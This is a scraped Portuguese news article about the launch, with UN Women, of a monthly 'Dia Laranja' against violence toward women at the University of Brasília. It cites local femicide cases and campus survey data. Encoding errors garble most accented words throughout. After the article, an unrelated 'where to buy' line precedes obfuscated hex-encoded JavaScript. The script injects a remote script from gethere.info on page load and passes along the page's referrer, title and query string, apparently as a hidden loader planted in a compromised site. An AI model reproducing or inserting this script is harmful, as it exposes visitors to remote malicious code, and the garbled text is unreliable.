Home » Brasil » Segurança » AulA?o na UNB marca o Dia pela EliminaA�A?o da ViolA?ncia contra as Mulheres

AulA?o na UNB marca o Dia pela EliminaA�A?o da ViolA?ncia contra as Mulheres

Criada por iniciativa de A?rgA?o da ONU, a data serA? celebrada no dia 25 de cada mA?s

Ericamar Guedes de Souza, 27 anos, foi assassinada hA? seis dias, dentro de casa, no ItapoA?. Ela estava grA?vida e A� uma das cinco mulheres mortas desde janeiro no DF por companheiros ou ex-namorados. A partir de agora, a luta contra esse tipo de caso terA? uma data para ser lembrada e discutida. O 25 de cada mA?s serA? o Dia pela EliminaA�A?o da ViolA?ncia contra as Mulheres, uma iniciativa da ONU Mulheres. SerA?o 24 horas de debates e aA�A�es voltadas para a mobilizaA�A?o contra o desrespeito ao gA?nero, o machismo e a misoginia: o Dia Laranja.

Ontem, deu-se a largada do projeto, em parceria com a Universidade de BrasA�lia (UnB). Em um mA?s, a CoordenaA�A?o de Direito das Mulheres da UnB registrou sete situaA�A�es de violA?ncia no cA?mpus. O comeA�o da aA�A?o no DF ocorreu com uma aula pA?blica no Centro de ConvivA?ncia Multicultural dos Povos IndA�genas da UnB (Maloca), com a presenA�a de professores, representantes da ONU Mulheres, alunos e interessados no assunto. A intenA�A?o A� evitar episA?dios como o de Ericamar e de Louise Ribeiro, 20 anos, assassinada no LaboratA?rio de Biologia da UnB (leia MemA?ria) pelo ex-namorado.

A coordenadora do NA?cleo de Estudos e Pesquisa sobre a Mulher da UnB, professora Lourdes Bandeira, afirma que o comportamento masculino, na quase maioria dos casos, trata de algo comum e tolerA?vel no sA�culo 17. Segundo ela, naquela A�poca, a mulher que trocava o parceiro por outro ou que trazia sobre ela a suspeita de adultA�rio poderia ser justificadamente morta. a�?A morte da A�ngela Diniz (pelo companheiro, Raul, o Doca Street, em dezembro de 1976, apA?s uma briga na casa de veraneio da vA�tima, em BA?zios) foi importante para comeA�ar a desestruturar o crime pela honra. A justificativa foi de que ela nA?o desempenhava mais o papel de esposa. Logo depois, criou-se o slogan a�?Quem ama nA?o mataa��. Isso tomou grandes proporA�A�es, notoriedade, foi bandeira da luta das mulheres contra a violA?ncia dos parceiros; e foi fundamentala�?, disse.
Uma das primeiras medidas da parceria da ONU Mulheres com a UnB serA? a formulaA�A?o de uma pesquisa da universidade para mapear como a violA?ncia acontece dentro do cA?mpus. Para a coordenadora da ONU, Amanda Kamanchek, o resultado dessa amostragem serA? essencial para polA�ticas pontuais na universidade. A previsA?o A� de que o estudo seja divulgado no comeA�o do prA?ximo ano. a�?As universidades precisam de apoio tA�cnico, porque foi revelado que havia muita violA?ncia dentro desse universoa�?, observou Amanda.
Um dos casos recentes de violA?ncia registrados pela CoordenaA�A?o de Direito das Mulheres da UnB A� o de um homem acusado de assA�dio. Ele acabou expulso do CA?mpus Darcy Ribeiro, na Asa Norte. AlA�m disso, no primeiro domingo do mA?s, durante a participaA�A?o nos Jogos InterCalouros, a bateria da AtlA�tica Maquinada, grupo da AssociaA�A?o AtlA�tica AcadA?mica das Engenharias da UnB, foi acusada de desrespeito A� mulher e apologia ao estupro. A PolA�cia Civil tambA�m investiga a denA?ncia. a�?Muitas mulheres tA?m medo. Como denunciar um professor, por exemplo? Quem vai defender? EntA?o, estamos aqui para fazer esse braA�o das alunas e articular com outros A?rgA?os, como a Ouvidoria da UnB, atA� a formalizaA�A?o dessa violA?nciaa�?, explicou a coordenadora de Direito das Mulheres da UnB, SA�lvia Bandim.
A coordenaA�A?o farA?, ainda, debates, relatA?rios, palestras e aA�A�es especA�ficas para combate e prevenA�A?o a�� o telefone para denA?ncias A� o 3107-3436. Uma pesquisa do Instituto Avon/Data Popular realizada com 1.823 universitA?rios de todo o paA�s, em setembro e outubro do ano passado, mostrou que 46% das mulheres tA?m medo de sofrer violA?ncia no ambiente universitA?rio. AlA�m disso, muitas sA?o humilhadas, xingadas ou ofendidas (52%); assediadas sexualmente (56%); ou atA� violentadas (28%).
EsforA�o mundial

O Dia Laranja pela EliminaA�A?o da ViolA?ncia contra as Mulheres, celebrado todo dia 25, ressalta o compromisso mundial de adoA�A?o da Agenda pelo Desenvolvimento SustentA?vel 2030. O documento reconhece que a igualdade de gA?nero, o empoderamento das mulheres e a eliminaA�A?o da violA?ncia contra elas sA?o centrais para o desenvolvimento sustentA?vel. Esse dia marca o comprometimento de cerca de 193 lA�deres mundiais com 17 metas globais para os prA?ximos 15 anos. A proposta da ONU Mulheres A� que o governo e as instituiA�A�es adotem a agenda sustentA?vel, propondo aA�A�es concretas e financiamento adequado para o cumprimento dos objetivos. O de nA?mero 5 A� a�?AlcanA�ar a igualdade de gA?nero por meio do fortalecimento das mulheres e meninasa�?. AlA�m disso, outros 12 objetivos de desenvolvimento sustentA?vel incorporam, transversalmente, metas de igualdade de gA?nero.
Onde comprar
Em www.recriarse.wordpress.com
Custa R$ 165

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Publicação: Redação Brasil (m)

Login

Perdeu sua senha?